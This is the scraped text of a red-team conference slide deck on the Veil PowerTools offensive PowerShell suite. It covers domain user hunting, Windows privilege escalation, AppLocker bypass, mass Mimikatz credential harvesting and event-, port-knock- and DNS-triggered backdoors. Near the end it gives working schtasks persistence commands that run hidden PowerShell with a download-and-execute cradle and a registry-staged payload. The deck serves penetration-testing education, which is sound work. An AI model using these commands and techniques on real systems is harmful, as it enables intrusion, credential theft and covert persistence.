Upload
harmj0y
View
1.772
Download
0
Tags:
Embed Size (px)
Citation preview
Drilling Deeper
with
Veil’s PowerToolsJustin Warner, Will Schroeder
Veris Group’s Adaptive Threat Division
@sixdub
◎Pentester and red teamer for the
Adaptive Threat Division of Veris Group
◎Lots of interest: red team ops, reverse
engineering, adversarial tactics, etc
◎Developer on the Veil-Framework and
co-founder of Veil’s PowerTools
@harmj0y
◎Security researcher and red teamer for
the Adaptive Threat Division of Veris
Group
◎Co-founder of the Veil-Framework and
founder of Veil’s PowerTools
◎Cons: Shmoocon, CarolinaCon, Defcon,
Derbycon, various BSides
tl;dr
◎ Introduction
◎PowerView
◎PowerUp
◎PowerPick
◎PewPewPew
◎PowerBreach
◎Dear M$
◎Demos
◎Questions
Introduction
How We Got Here
The Veil-Framework
◎An offensive toolkit aimed at bridging the
gap between pentesting and red teaming
capabilities
◎Started with the release of Veil-Evasion○ expanded with Catapult, Pillage, and
PowerView
◎CarolinaCon 2014 - “The Veil-
Framework”
Veil’s PowerTools
◎All of our offensive PowerShell work
from the Veil-Framework (and other
projects) was pulled into the new
PowerTools repo
◎PowerTools will remain the primary
source for all PowerShell work, with the
Veil repo containing offensive Python
projects
Sidenote:
Why PowerShell
○ PowerShell provides (out of the box):□ Full .NET access
□ application whitelisting
□ direct access to the Win32 API
□ ability to execute purely in memory
□ default installation Win7+ !
○ “Why I Choose PowerShell as an Attack
Platform”□ http://www.exploit-monday.com/2012/08/Why-I-
Choose-PowerShell.html
“Bad Guys”
“
“Microsoft’s Post-Exploitation
Language”
PowerShell:
-@obscuresec
PowerView
Domain Situational
Awareness
◎Think dsquery on steroids... and cocaine
◎First started because a client banned
“net” commands on domain machines
◎Otherwise initially inspired by Rob
Fuller’s netview.exe tool○ Wanted something more flexible that also didn’t
drop a binary to disk
Background
User Hunting
◎Goal: find which domain machines
specific users are logged into
◎ Invoke-UserHunter: finds where target
users or group members are logged into
on the network
◎ Invoke-StealthUserHunter: extracts
user homeDirectories from AD, gets
sessions on all these file servers to hunt
for targets
○ Significantly less traffic than Invoke-UserHunter
Offensive Event Parsing
◎Once you get DA, domain controller
event logs make it trivial to track down
user locations
◎PowerView’s Get-UserLogonEvents
lets you easily extract account logon
events (4624) from a host
◎ Invoke-UserEventHunter wraps this all
up into a weaponized form
Domain Trusts
◎PowerView can now enumerate and
exploit existing domain trusts:○ Get-NetDomainTrusts, Get-NetForestDomains
◎Most PowerView functions now accept a
“-Domain <name>” flag, allowing them to
operate across trusts○ e.g. Get-NetUsers –Domain sub.test.local
◎ Invoke-MapDomainTrusts can
recursively map all reachable trusts from
a foothold
Data Mining
◎PowerView’s Invoke-ShareFinder -
CheckAccess can find all shares
readable by the current user
◎ Invoke-FileFinder can search a network
for open file shares, or take a share list
from Invoke-ShareFinder
◎Spits out a .csv of found files, sortable by
creation or last access times
PowerUp
Automating Windows
Privesc
Background
◎On past assessments, had to escalate
privileges on a locked down workstation
◎Kernel exploits wouldn’t work, so fell
back to vulnerable service binaries
◎More or less did everything manually,
wanted something a bit easier○ Started implementing the “Encyclopedia of
Privesc”
Windows Services
◎One of the most effective escalation
vectors was (and still is) vulnerable
Windows services○ Sometimes can modify a service itself
○ Get-ServicePerms will check for these
◎However, many organizations overlook
the permissions for service binaries :)○ Use Get-ServiceEXEPerms, then overwrite the
service binary to add a local user or install an
agent
.DLL Hijacking
◎Many programs/services will search in
multiple locations when loading,
including directories listed in the PATH
environment variable
◎ If you have write access to any folder in
PATH, there’s a good chance you can
drop a malicious DLL and escalate
privileges○ Invoke-FindPathHijack will search for these
opportunities
PowerUp
◎Automates everything we’ve talked
about, and more
◎ Invoke-AllChecks will run all current
checks against a host
◎Functions exist to abuse most of the
escalation vectors found
PowerPick
Lock Picking the
AppLocker
Background
◎ Incident responders are recognizing and
targeting PowerShell.exe
○ Had a client write HIPS rules against
psh_psexec, YA, for reals
◎We wanted to be prepared for more
situations like this
◎Developed PowerPick as a combination of
solutions to run PowerShell without
powershell.exe
Bypassing the Blacklist
◎ Used assemblies in .NET/C# to execute code
○ System.Management.Automation
◎ Developed SharpPick
○ http://www.sixdub.net/2014/12/02/inexorable-
powershell-a-red-teamers-tale-of-overcoming-
simple-applocker-policies/
◎ To defeat with blacklist policy (not ideal), must
permission off or block DLLs in the Global
Assembly Cache (GAC)
○ C:\Windows\Assembly\*
OH BTW
Runspaces in Unmanaged Code
◎SharpPick wasn’t very sexy
○ Binary on disk = Lame!
◎Lee Christensen (@tifkin_) authored
“UnmanagedPowerShell” to utilize .NET
assemblies from C
○ Uses CLR and custom .NET assembly in memory
○ https://github.com/leechristensen/UnmanagedPo
werShell
◎Transformed this code into a reflective
DLL = ReflectivePick
PowerShell Inception = Injection!!
◎Decided it needed more PowerShell
◎Embedded ReflectivePick into Invoke-
ReflectivePEInjection from Powersploit
by @josephbialek
○ Created Invoke-PSInjector
◎ Injects DLL into remote process that
runs PowerShell code
ReflectivePick Diagram
*.exeInvoke-PSInjector
ReflectivePick
.NET AssemblyDownload Cradle
Invoke-PowerCeption?
PewPewPewLaunching Lazerz at
your Targets
Invoke-Mass*
◎Model to run PowerShell scripts on a
mass number of machines and retrieve
results:
1. A jobbified webserver is kicked off in the
background which serves out a specified
PowerShell file
2. A IEX() one-liner is executed on machines
through WMI to download/executed the
hosted code
3. Results are POSTed back to the local
webserver
Invoke-MassMimikatz
◎Executes PowerSploit’s Invoke-
Mimikatz on multiple machines without
PSRemoting
◎Raw Mimikatz results are saved on the
pivot host
◎Result files are parsed and
Server:Credential objects are output to
the pipeline
Invoke-MassMimikatz
Invoke-MassSearch
◎Microsoft has another gift for attackers,
the Windows Search Indexing Service○ Why search through all of a system’s file when
Windows does this for you?
◎ Invoke-MassSearch performs the same
pattern as Invoke-MassMimikatz○ allows you to query the search indexer across
machines where you have admin access
PowerBreach
New Release
Background
◎One obvious gap remaining in workflow
of Veil PowerTools
◎Motivation: offense in depth theory
◎Wanted multiple easy ways to remain
resident on the compromised systems○ Memory only
PowerBreach
◎Yes… More PowerShell○ Why not utilize our favorite scripting language?!
◎Goal: automate a bunch of
techniques/tools to backdoor a system
◎Multiple triggers, various host/network
signatures○ We will show some of the “cool” ones
Invoke-EventLogBackdoor
◎Based on Shmoocon 2013 “Wipe The
Drive” by Jake Williams
(@MalwareJake)
◎Uses Get-WinEvent to monitor windows
event logs for failed RDP attempts
◎When it recognizes “trigger” username,
phones home to attacker○ With an IEX(...) download cradle
Invoke-PortKnockBackdoor
◎Based upon Get-Packet by Robbie
Foust http://blog.robbiefoust.com/?p=68○ Uses system.net.sockets.socket to create raw
socket
○ Uses socket.iocontrol to make promiscuous
◎Promiscuously sniffs traffic on system
and inspects data for “magic” trigger
value ○ UDP, TCP, ICMP
Invoke-DeadUserBackdoor
◎Common action of attackers is to add
domain/local users
◎Uses ADSI to monitor for a users
existence
◎ If the user is not found, assumes the
worst and phones home
Invoke-ResolverBackdoor
◎Attempts to be a little stealthier and
usable on external assessments
◎Resolves specified DNS name on
interval and if the resolution doesn’t
equal a predefined IP...
◎… PHONE HOME TO THAT IP!
Persistence… If you must
◎Focuses more on non-persistent
backdoors
◎Schedule tasks seem to work really well
for PowerShell in domain networks
schtasks /create /tn OfficeUpdater /tr
"powershell.exe -w hidden -NonI -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://server/scri
pt.ps1'''))'" /sc onlogon /ru System
Registry Storage
◎Better yet, stage your script in the registry!
$backdoor = "write-host 123”
Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name
'secret' -Value $backdoor
schtasks /create /tn Updater /tr "powershell -c 'IEX (gp
HKLM:HARDWARE\ secret).secret'" /sc onlogon /ru
System
So what?
◎Nothing revolutionary here!
◎Nothing worse than owning a system
and not being able to get back on later!
◎Real power comes when combining
PowerTools○ PewPewPew with PowerBreach
2 Cents
Almost ready for the show!
Obligatory Defense Slide
◎HIPs and Whitelisting generally help
endpoint defense
◎Enterprise incident response capabilities○ Memory only capabilities but scripts (“malware”)
able to be easily recovered and analyzed
◎Need a clear way to restrict PowerShell
& .NET assemblies to certain users
True Story…
Demos
Questions?
◎Justin○ @sixsub
○ http://www.sixdub.net/
○ justin [at] sixdub.net
◎Will○ @harmj0y
○ http://blog.harmj0y.net/
○ will [at] harmj0y.net
◎https://github.com/veil-framework/PowerTools